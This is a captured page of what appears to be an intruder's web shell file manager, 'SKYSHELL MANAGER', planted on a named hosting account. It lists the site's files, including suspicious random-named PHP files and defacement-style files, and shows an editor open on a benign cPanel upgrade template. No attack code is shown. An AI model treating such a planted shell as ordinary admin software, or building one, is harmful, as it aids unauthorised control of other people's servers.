📁
SKYSHELL MANAGER
PHP v8.2.30
Create
Create
Path:
root
/
home
/
qooetu
/
costes.qooetu.com
/
Name
Size
Perm
Actions
📁
.well-known
-
0755
🗑️
🏷️
🔒
📁
2e19d9
-
0755
🗑️
🏷️
🔒
📁
6b114
-
0755
🗑️
🏷️
🔒
📁
Modules
-
0755
🗑️
🏷️
🔒
📁
app
-
0755
🗑️
🏷️
🔒
📁
assets
-
0755
🗑️
🏷️
🔒
📁
bootstrap
-
0755
🗑️
🏷️
🔒
📁
cgi-bin
-
0755
🗑️
🏷️
🔒
📁
config
-
0755
🗑️
🏷️
🔒
📁
css
-
0755
🗑️
🏷️
🔒
📁
database
-
0755
🗑️
🏷️
🔒
📁
images
-
0755
🗑️
🏷️
🔒
📁
js
-
0755
🗑️
🏷️
🔒
📁
nbproject
-
0755
🗑️
🏷️
🔒
📁
public
-
0755
🗑️
🏷️
🔒
📁
resources
-
0755
🗑️
🏷️
🔒
📁
routes
-
0755
🗑️
🏷️
🔒
📁
storage
-
0755
🗑️
🏷️
🔒
📁
tests
-
0755
🗑️
🏷️
🔒
📁
uploads
-
0755
🗑️
🏷️
🔒
📁
vendor
-
0755
🗑️
🏷️
🔒
📁
wp-admin
-
0755
🗑️
🏷️
🔒
📁
wp-content
-
0755
🗑️
🏷️
🔒
📁
wp-includes
-
0755
🗑️
🏷️
🔒
📄
.htaccess
0.23 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
COOKIE.txt
0.2 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
X7ROOT.txt
0.27 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
defaults.php
1.29 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
engine.php
0 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
error_log
813.08 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
features.php
11.28 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
googlecfb82e09419fc0f6.html
0.05 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
index.php0
1.56 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
inputs.php
0.12 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
kurd.html
1.07 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
library.php
0 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
min.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
p.php
2.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
php.ini
0.04 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
product.php
1.78 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
qpmwztts.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
robots.txt
0.32 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
tovmbkwh.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
tyyffovi.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
veoxv.html
1.23 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
Edit: action_upgrade.tt
[% USE JSON %] [% IF !data.notices.has() %] <p> [% locale.maketext('The system successfully upgraded the [asis,cPAddon].') %] </p> [% ELSE %] [% PROCESS 'addoncgi/views/notices.tt' notices => data.notices %] [% END %] [% IF data.show_converted %] <p> [% locale.maketext('The system could not upgrade the [asis,cPAddon]. The upgrade patch failed because the current installation uses the legacy [asis,cPAddon] system.') %] </p> <p> [% locale.maketext('Choose one of the following options:') %] <ul> <li>[% locale.maketext('Install a new one and manually import the current installation’s data into it.') %]</li> <li>[% locale.maketext('Do not change.') %]</li> </ul> </p> [% ELSE %] [% IF data.has_patch && data.patch_failed && !data.forced %] <div class="alert alert-danger"> <span class="glyphicon glyphicon-remove-sign"></span> <div class="alert-message"> <strong>[% locale.maketext('Error:') %]</strong> [% locale.maketext('You modified this [asis,cPAddon] or the upgrade test failed. You cannot update this [asis,cPAddon] via this interface.') %] </div> </div> <p> [% locale.maketext('To force the upgrade, enter the following information in the form below:') %] </p> [% IF data.has_patch && data.patch_failed && !form.force; # NOTE: Not localized intentionally. SET force_string = String.new(force_text); %] <p> [% force_text | html %] </p> [% IF !environment.called_from_root %] [% IF data.patch_test_output && data.verbose %] [% PROCESS addoncgi/views/collapse.tt, id = 'patch_test_output_b', show = locale.maketext('Display the patch test output.'), hide = locale.maketext('Hide patch test output.'), content = data.patch_test_output; %] [% END %] <div class="row"> <div id="upgrade-force-confirmation" class="col-xs-12 col-lg-7 callout callout-danger upgrade-force-confirm"> <div class="upgrade-confirm-message"> <i class="upgrade-force-dialog-icon fas fa-question-circle"></i> <form id="cpaddonsupform" method="post" action="[% environment.script_name | url %]" class="layout-medium"> <input type="hidden" name="verified" value="1" /> <input type="hidden" name="addon" value="[% data.addon | html %]" /> <input type="hidden" name="workinginstall" value="[% data.workinginstall | html %]" /> <input type="hidden" name="action" value="upgrade" /> <div class="form-group"> <p> <strong>[% locale.maketext('To force the upgrade, enter the following information in the form below:') %]</strong> </p> <p id="sourcetext"> [% data.force_text | html %] </p> <textarea type="text" name="force" class="form-control" maxlength="[% data.force_text_length %]" id="txtForce" rows="3" cols="80"></textarea> </div> <div class="form-group action-group"> <button type="submit" class="btn btn-primary" id="btnForce" disabled> <i id="spinner-install" style="display: none" class="fas fa-sync fa-spin"></i> [% locale.maketext('I understand that if I proceed, this process could possibly delete all customizations and break my installation.') %] </button> </div> </form> </div> </div> </div> <script type="text/javascript"> window.force_text = [% data.force_text.json() %] </script> [% ELSE %] <div class="alert alert-danger"> <span class="glyphicon glyphicon-remove-sign"></span> <div class="alert-message"> <strong>[% locale.maketext('Error:') %]</strong> [% locale.maketext('You modified this [asis,cPAddon] or the upgrade test failed. You cannot update this [asis,cPaddon] via this interface.') %] </div> </div> <p> [% locale.maketext('For technical reasons, you can only attempt a forced upgrade via [asis,cPanel] when logged in as the user with the user’s password.') %] </p> [% END %] [% END %] [% END %] [% END %] [% IF !environment.called_from_root; IF data.notices.has('critical_error', 'error'); IF form.oneclick == '1'; SET fix_url = to_uri(environment, 'addon=' _ module.name _ '&oneclick=1'); ELSE; SET fix_url = to_uri(environment, actionlessuri); END; %] <p align="center" id="fix"> [<a href="[% fix_url | url %]">[% locale.maketext('Back') %]</a>] </p> [% ELSE %] <p align="center" id="back"> [% SET back_url = to_uri(environment, 'addon=' _ module.name _ '&oneclick=' _ form.oneclick) %] [<a href="[% back_url | url %]">[% locale.maketext('Back') %]</a>] </p> [% END %] <p align="center" id="home"> [% SET home_url = to_uri(environment) %] [<a href="[% home_url | url %]">[% locale.maketext('Home') %]</a>] </p> [% END %]
Save